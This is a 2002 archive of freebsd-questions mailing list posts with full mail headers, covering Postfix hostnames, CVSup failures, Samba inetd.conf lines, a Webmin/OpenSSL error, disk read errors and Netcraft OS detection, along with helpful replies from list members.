SMTP; 25 Jun 2002 06:29:41 -0000 Message-ID: <3D180DC8.2030403@gmx.net> Date: Tue, 25 Jun 2002 08:29:28 +0200 From: Sunny Dale User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0rc1) Gecko/20020420 X-Accept-Language: en-us, en MIME-Version: 1.0 To: freebsd-questions@freebsd.org Subject: freebsd && postfix Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG hello people, -i am running FreeBSD 4.4release with postfix-1.1.11. -in main.cf i have set myhostname/mydomain/myorigin -postconf -n shows me that all of those parameters are set correctly. still postfix seems to get *its hostname* from gethostname(). when i do "hostname " suddenly it starts working. i'd prefer to set the hostname in main.cf though. on my linux box it works like charm. i have run diff on both main.cf's (might sound ridiculous yes...) and have found nothing which could cause the different behaviour. did i mention that some freemailers do not receive mail from this box because they cannot resolve its address?! anyone who has experienced similar problems? any hints will be highly appreciated. ps. if this question is moron ignore it. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 23:30:49 2002 Delivered-To: freebsd-questions@freebsd.org Received: from hotmail.com (oe20.law14.hotmail.com [64.4.20.124]) by hub.freebsd.org (Postfix) with ESMTP id 5EB9A37B449 for ; Mon, 24 Jun 2002 23:30:23 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Mon, 24 Jun 2002 23:30:23 -0700 X-Originating-IP: [216.139.3.186] From: "Remington" To: Subject: Test Date: Mon, 24 Jun 2002 23:30:07 -0700 Message-ID: <000001c21c11$bf5cb1a0$ba038bd8@bathoryaria> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 X-OriginalArrivalTime: 25 Jun 2002 06:30:23.0154 (UTC) FILETIME=[C8F86920:01C21C11] Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Sorry, but I haven't been able to post for a month, hopefully this email works. Please ignore To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 23:31:14 2002 Delivered-To: freebsd-questions@freebsd.org Received: from digger1.defence.gov.au (digger1.defence.gov.au [203.5.217.4]) by hub.freebsd.org (Postfix) with ESMTP id 61A8637B416 for ; Mon, 24 Jun 2002 23:30:40 -0700 (PDT) Received: from dsto-ms2.dsto.defence.gov.au (dsto-ms2.dsto.defence.gov.au [131.185.2.150]) by digger1.defence.gov.au (8.10.1/8.10.1) with ESMTP id g5P6TES09881 for ; Tue, 25 Jun 2002 15:59:14 +0930 (CST) Received: from muttley.dsto.defence.gov.au (unverified) by dsto-ms2.dsto.defence.gov.au (Content Technologies SMTPRS 4.1.5) with ESMTP id for ; Tue, 25 Jun 2002 16:00:29 +0930 Received: from salex001.dsto.defence.gov.au (salex001.dsto.defence.gov.au [131.185.2.9]) by muttley.dsto.defence.gov.au (8.9.3/8.9.3/8.9.3.LMD.990513) with ESMTP id PAA22725 for ; Tue, 25 Jun 2002 15:53:21 +0930 (CST) Received: from squirm.dsto.defence.gov.au ([131.185.75.211]) by salex001.dsto.defence.gov.au with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id M7A496P8; Tue, 25 Jun 2002 15:53:35 +0930 Date: Tue, 25 Jun 2002 15:43:46 +0930 (CST) From: "Wilkinson,Alex" X-X-Sender: wilkinsa@squirm.dsto.defence.gov.au Reply-To: Alex.Wilkinson@dsto.defence.gov.au To: freebsd-questions@freebsd.org Subject: make fetch ? Message-ID: <20020625154208.A5834-100000@squirm.dsto.defence.gov.au> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Howdy all, Is it possible to force a "make fetch" when the required distfile is already compiled into the base system ? eg shell>sudo make fetch ===> bzip2-1.0.2 bzip2 is in the base system. shell> Thanks - Alex To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 23:32:40 2002 Delivered-To: freebsd-questions@freebsd.org Received: from hotmail.com (f74.law8.hotmail.com [216.33.241.74]) by hub.freebsd.org (Postfix) with ESMTP id AF9B437B406 for ; Mon, 24 Jun 2002 23:32:34 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Mon, 24 Jun 2002 23:32:34 -0700 Received: from 61.11.74.131 by lw8fd.law8.hotmail.msn.com with HTTP; Tue, 25 Jun 2002 06:32:34 GMT X-Originating-IP: [61.11.74.131] From: "Ganesh Kumar" To: freebsd-questions@freebsd.org Subject: ISO file huuuge ! Date: Tue, 25 Jun 2002 06:32:34 +0000 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 25 Jun 2002 06:32:34.0508 (UTC) FILETIME=[174370C0:01C21C12] Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi, I created a ISO with mkisofs command.But the size is now 1024MB(vannila,rockridge and jolleit) which will hardly fit in to a normal CD. I would like to give this to the Windows users for installation. So shall I give only roockridge and jolliet ? Will they be able to install on that ? regards Ganesh Kumar _________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 23:38:44 2002 Delivered-To: freebsd-questions@freebsd.org Received: from windmill-en0.garlic.com (windmill-en0.garlic.com [208.195.160.130]) by hub.freebsd.org (Postfix) with ESMTP id B564537B405 for ; Mon, 24 Jun 2002 23:38:18 -0700 (PDT) Received: from bathoryaria (186.sm7.dialup.garlic.net [216.139.3.186]) by windmill-en0.garlic.com (8.11.1/8.11.1) with ESMTP id g5P6cHm43622 for ; Mon, 24 Jun 2002 23:38:17 -0700 From: "Remington L." To: Subject: Sony? Date: Mon, 24 Jun 2002 23:37:51 -0700 Message-ID: <000101c21c12$d4e917b0$ba038bd8@bathoryaria> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I have a Sony Vaio GRX-590(Intel P4 1.6GHZ, 512MB RAM, Mobility Radeom 7500, DVD/CD-RW). I want to install FreeBSD 4.6 on it. Does anyone know of potential problems that mioght occur on install and things of that nature. Its my first laptop and I know the hardware is really different than a tower. I just want to know if there are any unforeseen problems in store for me To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 23:48:18 2002 Delivered-To: freebsd-questions@freebsd.org Received: from serv1.wallnet.com (server1.wallnet.com [208.225.162.122]) by hub.freebsd.org (Postfix) with ESMTP id 200FB37B686 for ; Mon, 24 Jun 2002 23:44:21 -0700 (PDT) Received: (from root@localhost) by serv1.wallnet.com (8.11.5/8.11.5) id g5P6iKm70855 for questions@freebsd.org; Tue, 25 Jun 2002 02:44:20 -0400 (EDT) (envelope-from timothyk@serv1.wallnet.com) Received: from localhost (timothyk@localhost) by serv1.wallnet.com (8.11.5/8.11.5av) with ESMTP id g5P6iJ870847 for ; Tue, 25 Jun 2002 02:44:19 -0400 (EDT) (envelope-from timothyk@serv1.wallnet.com) X-Authentication-Warning: serv1.wallnet.com: timothyk owned process doing -bs Date: Tue, 25 Jun 2002 02:44:19 -0400 (EDT) From: Tim Kellers To: Subject: openssl/Webmin error Message-ID: <20020625024148.V70690-100000@serv1.wallnet.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG After doing a portupgrade from Webmin 0.96 to the latest version from cvsup ports: Attempting to start Webmin mini web server.. Starting Webmin server in /usr/local/lib/webmin ** ERR_load_RSA_strings: Unable to find an RSA implementation shared library. ** Install either the USA (librsaUSA.so) or International (librsaINTL.so) ** RSA library on your system and run this program again. ** See the OpenSSL chapter in the FreeBSD Handbook, located at ** http://www.freebsd.org/handbook/openssl.html, for more information. Segmentation fault - core dumped ERROR: Failed to start web server! openssl is installed, there is no librsaUSA.so or librsaINTL.so on any of the boxen (all 4.6-stable) that I'm also running... Anyone else seen this, or have any suggestions? Tim Kellers CPE/NJIT To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 23:54:15 2002 Delivered-To: freebsd-questions@freebsd.org Received: from gate.uai.etel.ru (gate.uai.etel.ru [195.38.57.243]) by hub.freebsd.org (Postfix) with ESMTP id CE40337B815 for ; Mon, 24 Jun 2002 23:49:57 -0700 (PDT) Received: by sendmail of gate.uai.etel.ru id g5P6nwE00363 for ; Tue, 25 Jun 2002 12:49:58 +0600 X-Authentication-Warning: gate.uai.etel.ru: smap set sender to using -f Received: from by gate.uai.etel.ru via smap (V2.1) id xma032745; Tue, 25 Jun 02 12:49:01 +0600 Received: by sendmail with ESMTP id g5P6n0xX008306 from vlad@telecom.ural.ru for ; Tue, 25 Jun 2002 12:49:00 +0600 Received: by sendmail id g5P6n0hl008305 for freebsd-questions@freebsd.org.KAV; Tue, 25 Jun 2002 12:49:00 +0600 Received: by sendmail with ESMTP id g5P6mwxX008297 from vlad@telecom.ural.ru for ; Tue, 25 Jun 2002 12:48:59 +0600 Date: Tue, 25 Jun 2002 12:49:02 +0600 From: "Vladimir G. Drobyshevsky" X-Mailer: The Bat! (v1.60m) Reply-To: "Vladimir G. Drobyshevsky" Organization: Computer saloons "TelescOp" X-Priority: 3 (Normal) Message-ID: <10710529530.20020625124902@telecom.ural.ru> To: freebsd-questions@freebsd.org Subject: CVSup didn't update sources - why? MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi! There is a problem exist on my system. CVSup wont cvsuping :) my local cvs-repository. There is a linsting below: Parsing supfile "/etc/cvs-supfile" Connecting to cvsup.FreeBSD.org Connected to cvsup.FreeBSD.org Server software version: SNAP_16_1e Negotiating file attribute support Exchanging collection information ...and after some time... Premature EOF from server Will retry at 12:24:49 Retrying ...and so on... That can it be? It works fine but after one moment it isn't. Vl. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 23:57: 2 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mx1.ovh.net (b1.ovh.net [213.186.33.51]) by hub.freebsd.org (Postfix) with ESMTP id 1EEFB37B857 for ; Mon, 24 Jun 2002 23:51:00 -0700 (PDT) Received: (qmail 7679 invoked by uid 503); 25 Jun 2002 06:50:11 -0000 Received: from unknown (HELO gueway.home) (212.43.212.24) by ns0.ovh.net with DES-CBC3-SHA encrypted SMTP; 25 Jun 2002 06:50:11 -0000 Received: from greatoak.home (greatoak.home [192.168.1.2]) by gueway.home (8.12.2/8.12.2) with ESMTP id g5P6ooxX000786 for ; Tue, 25 Jun 2002 08:50:54 +0200 (CEST) (envelope-from pcasidy@greatoak.home) Message-Id: <200206250650.g5P6ooxX000786@gueway.home> Date: Tue, 25 Jun 2002 08:53:12 +0200 (CEST) From: Philippe CASIDY Subject: Amount of FreeBSD servers is decreasing in servers statistics To: "FreeBSD.org Questions" MIME-Version: 1.0 Content-Type: TEXT/plain; charset=us-ascii Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi! I have tried netcraft.com to see how people can see my box using it and I read that I were using Apache2 on unknown where I expected it to be : "running Apache2 on FreeBSD". Trying a query on apache.org gave me the same result: http://uptime.netcraft.com/up/graph/?mode_u=off&mode_w=on&site=apache.org Does anybody have a clue? Thanks Phil. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 23:59:27 2002 Delivered-To: freebsd-questions@freebsd.org Received: from chen.org.nz (chen.org.nz [210.54.19.51]) by hub.freebsd.org (Postfix) with ESMTP id F241237B66A for ; Mon, 24 Jun 2002 23:57:06 -0700 (PDT) Received: from grimoire.chen.org.nz (localhost [127.0.0.1]) by chen.org.nz (8.12.3/8.12.3) with ESMTP id g5P6v5As043374; Tue, 25 Jun 2002 18:57:05 +1200 (NZST) (envelope-from jonc@grimoire.chen.org.nz) Received: (from jonc@localhost) by grimoire.chen.org.nz (8.12.3/8.12.3/Submit) id g5P6v49H043349; Tue, 25 Jun 2002 18:57:04 +1200 (NZST) (envelope-from jonc) Date: Tue, 25 Jun 2002 18:57:04 +1200 From: Jonathan Chen To: Scott Robbins Cc: Freebsd-questions@FreeBSD.ORG Subject: Re: Upgrading ssh--anything wrong with this method Message-ID: <20020625065703.GA33466@grimoire.chen.org.nz> References: <20020625070818.GA18001@scott1.homeunix.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020625070818.GA18001@scott1.homeunix.net> User-Agent: Mutt/1.4i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, Jun 25, 2002 at 02:08:18AM -0500, Scott Robbins wrote: [..] > In other words, just putting the newer version where the old version > was, and letting the default startup scripts start it. The recommended way is to leave everything where it wants to live, and change your /etc/rc.conf file so that it invokes the one in /usr/local. ie: /etc/rc.conf: sshd_program="/usr/local/sbin/sshd" # path to sshd The advantage of this method is that when you upgrade your system, any sshd coming off the installation media won't clobber your ports-installed one. -- Jonathan Chen ---------------------------------------------------------------------- When all else fails, RTFM To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 0: 7:53 2002 Delivered-To: freebsd-questions@freebsd.org Received: from web14405.mail.yahoo.com (web14405.mail.yahoo.com [216.136.174.62]) by hub.freebsd.org (Postfix) with SMTP id 6173C37BB43 for ; Tue, 25 Jun 2002 00:04:39 -0700 (PDT) Message-ID: <20020625070439.66209.qmail@web14405.mail.yahoo.com> Received: from [212.39.93.222] by web14405.mail.yahoo.com via HTTP; Tue, 25 Jun 2002 00:04:39 PDT Date: Tue, 25 Jun 2002 00:04:39 -0700 (PDT) From: milan nankov Subject: indetd.conf question To: questions@FreeBSD.org, freebsd-questions@FreeBSD.ORG MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hello, i have made my samba server to run at boot by add 2 line to the inetd.conf but when the system boots the error : "inetd[86]: netbios-ns/udp server failing (looping), service terminated" shows these are my 2 lines netbios-ssn stream tcp nowait smb /usr/local/samba/sbin/smbd -D netbios-ns dgram udp nowait smb /usr/local/samba/sbin/nmbd -D What's he problem ? Thank you in advance. __________________________________________________ Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 0: 8:21 2002 Delivered-To: freebsd-questions@freebsd.org Received: from web14405.mail.yahoo.com (web14405.mail.yahoo.com [216.136.174.62]) by hub.freebsd.org (Postfix) with SMTP id 7F90737BB44 for ; Tue, 25 Jun 2002 00:04:39 -0700 (PDT) Message-ID: <20020625070439.66209.qmail@web14405.mail.yahoo.com> Received: from [212.39.93.222] by web14405.mail.yahoo.com via HTTP; Tue, 25 Jun 2002 00:04:39 PDT Date: Tue, 25 Jun 2002 00:04:39 -0700 (PDT) From: milan nankov Subject: indetd.conf question To: questions@FreeBSD.org, freebsd-questions@FreeBSD.ORG MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hello, i have made my samba server to run at boot by add 2 line to the inetd.conf but when the system boots the error : "inetd[86]: netbios-ns/udp server failing (looping), service terminated" shows these are my 2 lines netbios-ssn stream tcp nowait smb /usr/local/samba/sbin/smbd -D netbios-ns dgram udp nowait smb /usr/local/samba/sbin/nmbd -D What's he problem ? Thank you in advance. __________________________________________________ Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 0:15:28 2002 Delivered-To: freebsd-questions@freebsd.org Received: from labs.unixhideout.com (dsl-65-187-193-189.telocity.com [65.187.193.189]) by hub.freebsd.org (Postfix) with ESMTP id 3654937BC78 for ; Tue, 25 Jun 2002 00:13:54 -0700 (PDT) Received: from UNIXHIDEOUT ([192.168.1.10]) by labs.unixhideout.com (8.12.4/8.12.3) with SMTP id g5P7DiFv028618 for ; Tue, 25 Jun 2002 03:13:46 -0400 (EDT) (envelope-from root@unixhideout.com) From: "ro0t" To: Subject: any idea what this means? Date: Tue, 25 Jun 2002 03:13:41 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > ad0s1d: hard error reading fsbn 135917743 of 29169720-29169723 (ad0s1 bn 135917743; cn 8460 tn 124 sn 31) status=59 error=40 I have never gotten this error before, is it the hard disk failing? if so why is it just one partition doing it? please respond to root@unixhideout.com as i am not on the list. Thanks. Mike "ro0t" Network Administrator. The UnixHideout Network. http://www.unixhideout.com "I can read your mind. And you should be ashamed of yourself." -ro0t To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 0:17:42 2002 Delivered-To: freebsd-questions@freebsd.org Received: from yeoman.sinbad.net (yeoman.sinbad.net [12.17.176.5]) by hub.freebsd.org (Postfix) with ESMTP id CFD4737BD12 for ; Tue, 25 Jun 2002 00:16:42 -0700 (PDT) Received: from there (95-7-237-24-cable.anchorageak.net [24.237.7.95]) by yeoman.sinbad.net (Postfix) with SMTP id 1AE42204B5; Mon, 24 Jun 2002 23:16:36 -0800 (AKDT) Content-Type: text/plain; charset="iso-8859-1" From: Beech Rintoul Reply-To: akbeech@sinbad.net To: "Vladimir G. Drobyshevsky" Subject: Re: CVSup didn't update sources - why? Date: Mon, 24 Jun 2002 23:16:35 -0800 X-Mailer: KMail [version 1.3] References: <10710529530.20020625124902@telecom.ural.ru> In-Reply-To: <10710529530.20020625124902@telecom.ural.ru> Organization: Sinbad Network Communications Cc: freebsd-questions@freebsd.org MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <20020625071636.1AE42204B5@yeoman.sinbad.net> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Monday 24 June 2002 10:49 pm, you wrote: > Hi! > > There is a problem exist on my system. CVSup wont cvsuping :) my > local cvs-repository. > There is a linsting below: > > Parsing supfile "/etc/cvs-supfile" > Connecting to cvsup.FreeBSD.org > Connected to cvsup.FreeBSD.org > Server software version: SNAP_16_1e > Negotiating file attribute support > Exchanging collection information > ...and after some time... > Premature EOF from server > Will retry at 12:24:49 > Retrying > ...and so on... > > That can it be? It works fine but after one moment it isn't. > Try changing your supfile to cvsup1.freebsd.org or cvsup3.freebsd.org, if that doesn't work post /etc/cvsupfile. It's impossible to tell what the problem is without looking at your configs. Beech -- ------------------------------------------------------------------- Beech Rintoul - SysAdmin - akbeech@sinbad.net /"\ ASCII Ribbon Campaign | Sinbad Network Communications \ / - NO HTML/RTF in e-mail | 3101 Penland Parkway #K-38 X - NO Word docs in e-mail | Anchorage, AK 99508-1957 / \ ----------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 0:24:14 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp.infracaninophile.co.uk (happy-idiot-talk.infracaninophile.co.uk [81.2.69.218]) by hub.freebsd.org (Postfix) with ESMTP id CFB9C37B401 for ; Tue, 25 Jun 2002 00:24:03 -0700 (PDT) Received: from happy-idiot-talk.infracaninophile.co.uk (localhost.infracaninophile.co.uk [IPv6:::1]) by smtp.infracaninophile.co.uk (8.12.4/8.12.4) with ESMTP id g5P7O24W013511; Tue, 25 Jun 2002 08:24:02 +0100 (BST) (envelope-from matthew@happy-idiot-talk.infracaninophile.co.uk) Received: (from matthew@localhost) by happy-idiot-talk.infracaninophile.co.uk (8.12.4/8.12.4/Submit) id g5P7NuQu013510; Tue, 25 Jun 2002 08:23:56 +0100 (BST) Date: Tue, 25 Jun 2002 08:23:56 +0100 From: Matthew Seaman To: milan nankov Cc: questions@FreeBSD.ORG Subject: Re: indetd.conf question Message-ID: <20020625072356.GA13320@happy-idiot-talk.infracaninophi> References: <20020625070439.66209.qmail@web14405.mail.yahoo.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020625070439.66209.qmail@web14405.mail.yahoo.com> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, Jun 25, 2002 at 12:04:39AM -0700, milan nankov wrote: > i have made my samba server to run at boot by add 2 > line to the inetd.conf but when the system boots the > error : "inetd[86]: netbios-ns/udp server failing > (looping), service terminated" shows > > these are my 2 lines > netbios-ssn stream tcp nowait smb > /usr/local/samba/sbin/smbd -D > > netbios-ns dgram udp nowait smb > /usr/local/samba/sbin/nmbd -D Make that: netbios-ssn stream tcp nowait root /usr/local/sbin/smbd smbd netbios-ns dgram udp wait root /usr/local/sbin/nmbd nmbd Particularly, don't use the `-D' flag as that tells smbd or nmbd that it's being run as a standalone daemon and specifically not from inetd. Also only one nmbd should be run at a time, hence you need inetd to wait for the current invocation to finish before starting a new one. I don't know if it's possible to run Samba daemons under other than root --- I guess they will, because they need root in order to set permissions and ownership on the files they serve. However, I could be wrong. Cheers, Matthew -- Dr Matthew J Seaman MA, D.Phil. 26 The Paddocks Savill Way Tel: +44 1628 476614 Marlow Fax: +44 0870 0522645 Bucks., SL7 1TH UK To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 0:31:20 2002 Delivered-To: freebsd-questions@freebsd.org Received: from yeoman.sinbad.net (yeoman.sinbad.net [12.17.176.5]) by hub.freebsd.org (Postfix) with ESMTP id DDA6037B49D for ; Tue, 25 Jun 2002 00:30:23 -0700 (PDT) Received: from there (95-7-237-24-cable.anchorageak.net [24.237.7.95]) by yeoman.sinbad.net (Postfix) with SMTP id E781720CDA; Mon, 24 Jun 2002 23:30:21 -0800 (AKDT) Content-Type: text/plain; charset="iso-8859-1" From: Beech Rintoul Reply-To: akbeech@sinbad.net To: "ro0t" , Subject: Re: any idea what this means? Date: Mon, 24 Jun 2002 23:30:21 -0800 X-Mailer: KMail [version 1.3] References: In-Reply-To: Organization: Sinbad Network Communications MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <20020625073021.E781720CDA@yeoman.sinbad.net> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Monday 24 June 2002 11:13 pm, ro0t wrote: > > ad0s1d: hard error reading fsbn 135917743 of 29169720-29169723 (ad0s1 bn > > 135917743; cn 8460 tn 124 sn 31) status=59 error=40 > > I have never gotten this error before, is it the hard disk failing? if so > why is it just one partition doing it? please respond to > root@unixhideout.com as i am not on the list. Thanks. > > > Mike "ro0t" That's not a good sign. It's not unusual for HD problems to start on one partition. I would back up your drive and also check your cables for tightness. Beech -- ------------------------------------------------------------------- Beech Rintoul - SysAdmin - akbeech@sinbad.net /"\ ASCII Ribbon Campaign | Sinbad Network Communications \ / - NO HTML/RTF in e-mail | 3101 Penland Parkway #K-38 X - NO Word docs in e-mail | Anchorage, AK 99508-1957 / \ ----------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 0:41: 0 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mailb.telia.com (mailb.telia.com [194.22.194.6]) by hub.freebsd.org (Postfix) with ESMTP id 8AB5937B426 for ; Tue, 25 Jun 2002 00:39:43 -0700 (PDT) Received: from rambo.simx.org (62-59.twenty4help.se [62.20.102.59] (may be forged)) by mailb.telia.com (8.11.6/8.11.6) with ESMTP id g5P7dXQ03689; Tue, 25 Jun 2002 09:39:33 +0200 (CEST) Message-ID: <3D181E75.5030607@rambo.simx.org> Date: Tue, 25 Jun 2002 09:40:37 +0200 From: "Roger 'Rocky' Vetterberg" User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0rc2) Gecko/20020512 Netscape/7.0b1 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Philippe CASIDY Cc: "FreeBSD.org Questions" Subject: Re: Amount of FreeBSD servers is decreasing in servers statistics References: <200206250650.g5P6ooxX000786@gueway.home> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Philippe CASIDY wrote: > Hi! > > I have tried netcraft.com to see how people can see my box using it and > I read that I were using Apache2 on unknown where I expected it to be : > "running Apache2 on FreeBSD". > Trying a query on apache.org gave me the same result: > http://uptime.netcraft.com/up/graph/?mode_u=off&mode_w=on&site=apache.org > > Does anybody have a clue? > > Thanks > > Phil. > The same happened to me after upgrading to FreeBSD 4.6. My guess is that something changed between 4.5 to 4.6 that makes Netcraft unable to recognize the os. It will probably not take long before Netcraft notices and updates their detection software to correctly identify FreeBSD 4.6 as well. -- R To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 0:54:46 2002 Delivered-To: freebsd-questions@freebsd.org Received: from labs.unixhideout.com (dsl-65-187-193-189.telocity.com [65.187.193.189]) by hub.freebsd.org (Postfix) with ESMTP id EDF8A37B42B for ; Tue, 25 Jun 2002 00:53:34 -0700 (PDT) Received: from UNIXHIDEOUT ([192.168.1.10]) by labs.unixhideout.com (8.12.4/8.12.3) with SMTP id g5P7rZFv029401; Tue, 25 Jun 2002 03:53:37 -0400 (EDT) (envelope-from root@unixhideout.com) From: "ro0t" To: , Subject: RE: any idea what this means? Date: Tue, 25 Jun 2002 03:53:32 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <20020625073021.E781720CDA@yeoman.sinbad.net> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Monday 24 June 2002 11:13 pm, ro0t wrote: ad0s1d: hard error reading fsbn 